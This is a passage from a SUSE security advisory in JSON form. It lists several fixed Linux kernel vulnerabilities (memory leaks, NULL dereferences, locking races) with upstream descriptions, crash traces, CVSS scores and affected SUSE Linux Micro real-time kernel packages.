"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: core: Fix target_cmd_counter leak\n\nThe target_cmd_counter struct allocated via target_alloc_cmd_counter() is\nnever freed, resulting in leaks across various transport types, e.g.:\n\n unreferenced object 0xffff88801f920120 (size 96):\n comm \"sh\", pid 102, jiffies 4294892535 (age 713.412s)\n hex dump (first 32 bytes):\n 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 38 01 92 1f 80 88 ff ff ........8.......\n backtrace:\n [\u003c00000000e58a6252\u003e] kmalloc_trace+0x11/0x20\n [\u003c0000000043af4b2f\u003e] target_alloc_cmd_counter+0x17/0x90 [target_core_mod]\n [\u003c000000007da2dfa7\u003e] target_setup_session+0x2d/0x140 [target_core_mod]\n [\u003c0000000068feef86\u003e] tcm_loop_tpg_nexus_store+0x19b/0x350 [tcm_loop]\n [\u003c000000006a80e021\u003e] configfs_write_iter+0xb1/0x120\n [\u003c00000000e9f4d860\u003e] vfs_write+0x2e4/0x3c0\n [\u003c000000008143433b\u003e] ksys_write+0x80/0xb0\n [\u003c00000000a7df29b2\u003e] do_syscall_64+0x42/0x90\n [\u003c0000000053f45fb8\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFree the structure alongside the corresponding iscsit_conn / se_sess\nparent.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54154",
"url": "https://www.suse.com/security/cve/CVE-2023-54154"
},
{
"category": "external",
"summary": "SUSE Bug 1256082 for CVE-2023-54154",
"url": "https://bugzilla.suse.com/1256082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54154"
},
{
"cve": "CVE-2023-54155",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54155"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: core: remove unnecessary frame_sz check in bpf_xdp_adjust_tail()\n\nSyzkaller reported the following issue:\n=======================================\nToo BIG xdp-\u003eframe_sz = 131072\nWARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121\n ____bpf_xdp_adjust_tail net/core/filter.c:4121 [inline]\nWARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121\n bpf_xdp_adjust_tail+0x466/0xa10 net/core/filter.c:4103\n...\nCall Trace:\n \u003cTASK\u003e\n bpf_prog_4add87e5301a4105+0x1a/0x1c\n __bpf_prog_run include/linux/filter.h:600 [inline]\n bpf_prog_run_xdp include/linux/filter.h:775 [inline]\n bpf_prog_run_generic_xdp+0x57e/0x11e0 net/core/dev.c:4721\n netif_receive_generic_xdp net/core/dev.c:4807 [inline]\n do_xdp_generic+0x35c/0x770 net/core/dev.c:4866\n tun_get_user+0x2340/0x3ca0 drivers/net/tun.c:1919\n tun_chr_write_iter+0xe8/0x210 drivers/net/tun.c:2043\n call_write_iter include/linux/fs.h:1871 [inline]\n new_sync_write fs/read_write.c:491 [inline]\n vfs_write+0x650/0xe40 fs/read_write.c:584\n ksys_write+0x12f/0x250 fs/read_write.c:637\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nxdp-\u003eframe_sz \u003e PAGE_SIZE check was introduced in commit c8741e2bfe87\n(\"xdp: Allow bpf_xdp_adjust_tail() to grow packet size\"). But Jesper\nDangaard Brouer \u003cjbrouer@redhat.com\u003e noted that after introducing the\nxdp_init_buff() which all XDP driver use - it\u0027s safe to remove this\ncheck. The original intend was to catch cases where XDP drivers have\nnot been updated to use xdp.frame_sz, but that is not longer a concern\n(since xdp_init_buff).\n\nRunning the initial syzkaller repro it was discovered that the\ncontiguous physical memory allocation is used for both xdp paths in\ntun_get_user(), e.g. tun_build_skb() and tun_alloc_skb(). It was also\nstated by Jesper Dangaard Brouer \u003cjbrouer@redhat.com\u003e that XDP can\nwork on higher order pages, as long as this is contiguous physical\nmemory (e.g. a page).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54155",
"url": "https://www.suse.com/security/cve/CVE-2023-54155"
},
{
"category": "external",
"summary": "SUSE Bug 1256083 for CVE-2023-54155",
"url": "https://bugzilla.suse.com/1256083"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54155"
},
{
"cve": "CVE-2023-54156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsfc: fix crash when reading stats while NIC is resetting\n\nefx_net_stats() (.ndo_get_stats64) can be called during an ethtool\n selftest, during which time nic_data-\u003emc_stats is NULL as the NIC has\n been fini\u0027d. In this case do not attempt to fetch the latest stats\n from the hardware, else we will crash on a NULL dereference:\n BUG: kernel NULL pointer dereference, address: 0000000000000038\n RIP efx_nic_update_stats\n abridged calltrace:\n efx_ef10_update_stats_pf\n efx_net_stats\n dev_get_stats\n dev_seq_printf_stats\nSkipping the read is safe, we will simply give out stale stats.\nTo ensure that the free in efx_ef10_fini_nic() does not race against\n efx_ef10_update_stats_pf(), which could cause a TOCTTOU bug, take the\n efx-\u003estats_lock in fini_nic (it is already held across update_stats).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54156",
"url": "https://www.suse.com/security/cve/CVE-2023-54156"
},
{
"category": "external",
"summary": "SUSE Bug 1255704 for CVE-2023-54156",
"url": "https://bugzilla.suse.com/1255704"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54156"
},
{
"cve": "CVE-2023-54164",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54164"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: ISO: fix iso_conn related locking and validity issues\n\nsk-\u003esk_state indicates whether iso_pi(sk)-\u003econn is valid. Operations\nthat check/update sk_state and access conn should hold lock_sock,\notherwise they can race.\n\nThe order of taking locks is hci_dev_lock \u003e lock_sock \u003e iso_conn_lock,\nwhich is how it is in connect/disconnect_cfm -\u003e iso_conn_del -\u003e\niso_chan_del.\n\nFix locking in iso_connect_cis/bis and sendmsg/recvmsg to take lock_sock\naround updating sk_state and conn.\n\niso_conn_del must not occur during iso_connect_cis/bis, as it frees the\niso_conn. Hold hdev-\u003elock longer to prevent that.\n\nThis should not reintroduce the issue fixed in commit 241f51931c35\n(\"Bluetooth: ISO: Avoid circular locking dependency\"), since the we\nacquire locks in order. We retain the fix in iso_sock_connect to release\nlock_sock before iso_connect_* acquires hdev-\u003elock.\n\nSimilarly for commit 6a5ad251b7cd (\"Bluetooth: ISO: Fix possible\ncircular locking dependency\"). We retain the fix in iso_conn_ready to\nnot acquire iso_conn_lock before lock_sock.\n\niso_conn_add shall return iso_conn with valid hcon. Make it so also when\nreusing an old CIS connection waiting for disconnect timeout (see\n__iso_sock_close where conn-\u003ehcon is set to NULL).\n\nTrace with iso_conn_del after iso_chan_add in iso_connect_cis:\n===============================================================\niso_sock_create:771: sock 00000000be9b69b7\niso_sock_init:693: sk 000000004dff667e\niso_sock_bind:827: sk 000000004dff667e 70:1a:b8:98:ff:a2 type 1\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_connect:875: sk 000000004dff667e\niso_connect_cis:353: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\nhci_get_route:1199: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\nhci_conn_add:1005: hci0 dst 28:3d:c2:4a:7e:da\niso_conn_add:140: hcon 000000007b65d182 conn 00000000daf8625e\n__iso_chan_add:214: conn 00000000daf8625e\niso_connect_cfm:1700: hcon 000000007b65d182 bdaddr 28:3d:c2:4a:7e:da status 12\niso_conn_del:187: hcon 000000007b65d182 conn 00000000daf8625e, err 16\niso_sock_clear_timer:117: sock 000000004dff667e state 3\n \u003cNote: sk_state is BT_BOUND (3), so iso_connect_cis is still\n running at this point\u003e\niso_chan_del:153: sk 000000004dff667e, conn 00000000daf8625e, err 16\nhci_conn_del:1151: hci0 hcon 000000007b65d182 handle 65535\nhci_conn_unlink:1102: hci0: hcon 000000007b65d182\nhci_chan_list_flush:2780: hcon 000000007b65d182\niso_sock_getsockopt:1376: sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getsockopt:1376: sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_shutdown:1434: sock 00000000be9b69b7, sk 000000004dff667e, how 1\n__iso_sock_close:632: sk 000000004dff667e state 5 socket 00000000be9b69b7\n \u003cNote: sk_state is BT_CONNECT (5), even though iso_chan_del sets\n BT_CLOSED (6). Only iso_connect_cis sets it to BT_CONNECT, so it\n must be that iso_chan_del occurred between iso_chan_add and end of\n iso_connect_cis.\u003e\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPGD 8000000006467067 P4D 8000000006467067 PUD 3f5f067 PMD 0\nOops: 0000 [#1] PREEMPT SMP PTI\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-1.fc38 04/01/2014\nRIP: 0010:__iso_sock_close (net/bluetooth/iso.c:664) bluetooth\n===============================================================\n\nTrace with iso_conn_del before iso_chan_add in iso_connect_cis:\n===============================================================\niso_connect_cis:356: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\n...\niso_conn_add:140: hcon 0000000093bc551f conn 00000000768ae504\nhci_dev_put:1487: hci0 orig refcnt 21\nhci_event_packet:7607: hci0: e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54164",
"url": "https://www.suse.com/security/cve/CVE-2023-54164"
},
{
"category": "external",
"summary": "SUSE Bug 1256071 for CVE-2023-54164",
"url": "https://bugzilla.suse.com/1256071"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54164"
},
{
"cve": "CVE-2023-54166",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54166"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nigc: Fix Kernel Panic during ndo_tx_timeout callback\n\nThe Xeon validation group has been carrying out some loaded tests\nwith various HW configurations, and they have seen some transmit\nqueue time out happening during the test. This will cause the\nreset adapter function to be called by igc_tx_timeout().\nSimilar race conditions may arise when the interface is being brought\ndown and up in igc_reinit_locked(), an interrupt being generated, and\nigc_clean_tx_irq() being called to complete the TX.\n\nWhen the igc_tx_timeout() function is invoked, this patch will turn\noff all TX ring HW queues during igc_down() process. TX ring HW queues\nwill be activated again during the igc_configure_tx_ring() process\nwhen performing the igc_up() procedure later.\n\nThis patch also moved existing igc_disable_tx_ring_hw() to avoid using\nforward declaration.\n\nKernel trace:\n[ 7678.747813] ------------[ cut here ]------------\n[ 7678.757914] NETDEV WATCHDOG: enp1s0 (igc): transmit queue 2 timed out\n[ 7678.770117] WARNING: CPU: 0 PID: 13 at net/sched/sch_generic.c:525 dev_watchdog+0x1ae/0x1f0\n[ 7678.784459] Modules linked in: xt_conntrack nft_chain_nat xt_MASQUERADE xt_addrtype nft_compat\nnf_tables nfnetlink br_netfilter bridge stp llc overlay dm_mod emrcha(PO) emriio(PO) rktpm(PO)\ncegbuf_mod(PO) patch_update(PO) se(PO) sgx_tgts(PO) mktme(PO) keylocker(PO) svtdx(PO) svfs_pci_hotplug(PO)\nvtd_mod(PO) davemem(PO) svmabort(PO) svindexio(PO) usbx2(PO) ehci_sched(PO) svheartbeat(PO) ioapic(PO)\nsv8259(PO) svintr(PO) lt(PO) pcierootport(PO) enginefw_mod(PO) ata(PO) smbus(PO) spiflash_cdf(PO) arden(PO)\ndsa_iax(PO) oobmsm_punit(PO) cpm(PO) svkdb(PO) ebg_pch(PO) pch(PO) sviotargets(PO) svbdf(PO) svmem(PO)\nsvbios(PO) dram(PO) svtsc(PO) targets(PO) superio(PO) svkernel(PO) cswitch(PO) mcf(PO) pentiumIII_mod(PO)\nfs_svfs(PO) mdevdefdb(PO) svfs_os_services(O) ixgbe mdio mdio_devres libphy emeraldrapids_svdefs(PO)\nregsupport(O) libnvdimm nls_cp437 snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio snd_hda_intel\nsnd_intel_dspcfg snd_hda_codec snd_hwdep x86_pkg_temp_thermal snd_hda_core snd_pcm snd_timer isst_if_mbox_pci\n[ 7678.784496] input_leds isst_if_mmio sg snd isst_if_common soundcore wmi button sad9(O) drm fuse backlight\nconfigfs efivarfs ip_tables x_tables vmd sdhci led_class rtl8150 r8152 hid_generic pegasus mmc_block usbhid\nmmc_core hid megaraid_sas ixgb igb i2c_algo_bit ice i40e hpsa scsi_transport_sas e1000e e1000 e100 ax88179_178a\nusbnet xhci_pci sd_mod xhci_hcd t10_pi crc32c_intel crc64_rocksoft igc crc64 crc_t10dif usbcore\ncrct10dif_generic ptp crct10dif_common usb_common pps_core\n[ 7679.200403] RIP: 0010:dev_watchdog+0x1ae/0x1f0\n[ 7679.210201] Code: 28 e9 53 ff ff ff 4c 89 e7 c6 05 06 42 b9 00 01 e8 17 d1 fb ff 44 89 e9 4c\n89 e6 48 c7 c7 40 ad fb 81 48 89 c2 e8 52 62 82 ff \u003c0f\u003e 0b e9 72 ff ff ff 65 8b 05 80 7d 7c 7e\n89 c0 48 0f a3 05 0a c1\n[ 7679.245438] RSP: 0018:ffa00000001f7d90 EFLAGS: 00010282\n[ 7679.256021] RAX: 0000000000000000 RBX: ff11000109938440 RCX: 0000000000000000\n[ 7679.268710] RDX: ff11000361e26cd8 RSI: ff11000361e1b880 RDI: ff11000361e1b880\n[ 7679.281314] RBP: ffa00000001f7da8 R08: ff1100035f8fffe8 R09: 0000000000027ffb\n[ 7679.293840] R10: 0000000000001f0a R11: ff1100035f840000 R12: ff11000109938000\n[ 7679.306276] R13: 0000000000000002 R14: dead000000000122 R15: ffa00000001f7e18\n[ 7679.318648] FS: 0000000000000000(0000) GS:ff11000361e00000(0000) knlGS:0000000000000000\n[ 7679.332064] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 7679.342757] CR2: 00007ffff7fca168 CR3: 000000013b08a006 CR4: 0000000000471ef8\n[ 7679.354984] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 7679.367207] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 7679.379370] PKRU: 55555554\n[ 7679.386446] Call Trace:\n[ 7679.393152] \u003cTASK\u003e\n[ 7679.399363] ? __pfx_dev_watchdog+0x10/0x10\n[ 7679.407870] call_timer_fn+0x31/0x110\n[ 7679.415698] e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54166",
"url": "https://www.suse.com/security/cve/CVE-2023-54166"
},
{
"category": "external",
"summary": "SUSE Bug 1256074 for CVE-2023-54166",
"url": "https://bugzilla.suse.com/1256074"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54166"
},
{
"cve": "CVE-2023-54169",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54169"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: fix memory leak in mlx5e_ptp_open\n\nWhen kvzalloc_node or kvzalloc failed in mlx5e_ptp_open, the memory\npointed by \"c\" or \"cparams\" is not freed, which can lead to a memory\nleak. Fix by freeing the array in the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54169",
"url": "https://www.suse.com/security/cve/CVE-2023-54169"
},
{
"category": "external",
"summary": "SUSE Bug 1256050 for CVE-2023-54169",
"url": "https://bugzilla.suse.com/1256050"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54169"
},
{
"cve": "CVE-2023-54170",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54170"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkeys: Fix linking a duplicate key to a keyring\u0027s assoc_array\n\nWhen making a DNS query inside the kernel using dns_query(), the request\ncode can in rare cases end up creating a duplicate index key in the\nassoc_array of the destination keyring. It is eventually found by\na BUG_ON() check in the assoc_array implementation and results in\na crash.\n\nExample report:\n[2158499.700025] kernel BUG at ../lib/assoc_array.c:652!\n[2158499.700039] invalid opcode: 0000 [#1] SMP PTI\n[2158499.700065] CPU: 3 PID: 31985 Comm: kworker/3:1 Kdump: loaded Not tainted 5.3.18-150300.59.90-default #1 SLE15-SP3\n[2158499.700096] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020\n[2158499.700351] Workqueue: cifsiod cifs_resolve_server [cifs]\n[2158499.700380] RIP: 0010:assoc_array_insert+0x85f/0xa40\n[2158499.700401] Code: ff 74 2b 48 8b 3b 49 8b 45 18 4c 89 e6 48 83 e7 fe e8 95 ec 74 00 3b 45 88 7d db 85 c0 79 d4 0f 0b 0f 0b 0f 0b e8 41 f2 be ff \u003c0f\u003e 0b 0f 0b 81 7d 88 ff ff ff 7f 4c 89 eb 4c 8b ad 58 ff ff ff 0f\n[2158499.700448] RSP: 0018:ffffc0bd6187faf0 EFLAGS: 00010282\n[2158499.700470] RAX: ffff9f1ea7da2fe8 RBX: ffff9f1ea7da2fc1 RCX: 0000000000000005\n[2158499.700492] RDX: 0000000000000000 RSI: 0000000000000005 RDI: 0000000000000000\n[2158499.700515] RBP: ffffc0bd6187fbb0 R08: ffff9f185faf1100 R09: 0000000000000000\n[2158499.700538] R10: ffff9f1ea7da2cc0 R11: 000000005ed8cec8 R12: ffffc0bd6187fc28\n[2158499.700561] R13: ffff9f15feb8d000 R14: ffff9f1ea7da2fc0 R15: ffff9f168dc0d740\n[2158499.700585] FS: 0000000000000000(0000) GS:ffff9f185fac0000(0000) knlGS:0000000000000000\n[2158499.700610] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[2158499.700630] CR2: 00007fdd94fca238 CR3: 0000000809d8c006 CR4: 00000000003706e0\n[2158499.700702] Call Trace:\n[2158499.700741] ? key_alloc+0x447/0x4b0\n[2158499.700768] ? __key_link_begin+0x43/0xa0\n[2158499.700790] __key_link_begin+0x43/0xa0\n[2158499.700814] request_key_and_link+0x2c7/0x730\n[2158499.700847] ? dns_resolver_read+0x20/0x20 [dns_resolver]\n[2158499.700873] ? key_default_cmp+0x20/0x20\n[2158499.700898] request_key_tag+0x43/0xa0\n[2158499.700926] dns_query+0x114/0x2ca [dns_resolver]\n[2158499.701127] dns_resolve_server_name_to_ip+0x194/0x310 [cifs]\n[2158499.701164] ? scnprintf+0x49/0x90\n[2158499.701190] ? __switch_to_asm+0x40/0x70\n[2158499.701211] ? __switch_to_asm+0x34/0x70\n[2158499.701405] reconn_set_ipaddr_from_hostname+0x81/0x2a0 [cifs]\n[2158499.701603] cifs_resolve_server+0x4b/0xd0 [cifs]\n[2158499.701632] process_one_work+0x1f8/0x3e0\n[2158499.701658] worker_thread+0x2d/0x3f0\n[2158499.701682] ? process_one_work+0x3e0/0x3e0\n[2158499.701703] kthread+0x10d/0x130\n[2158499.701723] ? kthread_park+0xb0/0xb0\n[2158499.701746] ret_from_fork+0x1f/0x40\n\nThe situation occurs as follows:\n* Some kernel facility invokes dns_query() to resolve a hostname, for\n example, \"abcdef\". The function registers its global DNS resolver\n cache as current-\u003ecred.thread_keyring and passes the query to\n request_key_net() -\u003e request_key_tag() -\u003e request_key_and_link().\n* Function request_key_and_link() creates a keyring_search_context\n object. Its match_data.cmp method gets set via a call to\n type-\u003ematch_preparse() (resolves to dns_resolver_match_preparse()) to\n dns_resolver_cmp().\n* Function request_key_and_link() continues and invokes\n search_process_keyrings_rcu() which returns that a given key was not\n found. The control is then passed to request_key_and_link() -\u003e\n construct_alloc_key().\n* Concurrently to that, a second task similarly makes a DNS query for\n \"abcdef.\" and its result gets inserted into the DNS resolver cache.\n* Back on the first task, function construct_alloc_key() first runs\n __key_link_begin() to determine an assoc_array_edit operation to\n insert a new key. Index keys in the array are compared exactly as-is,\n using keyring_compare_object(). The operation \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
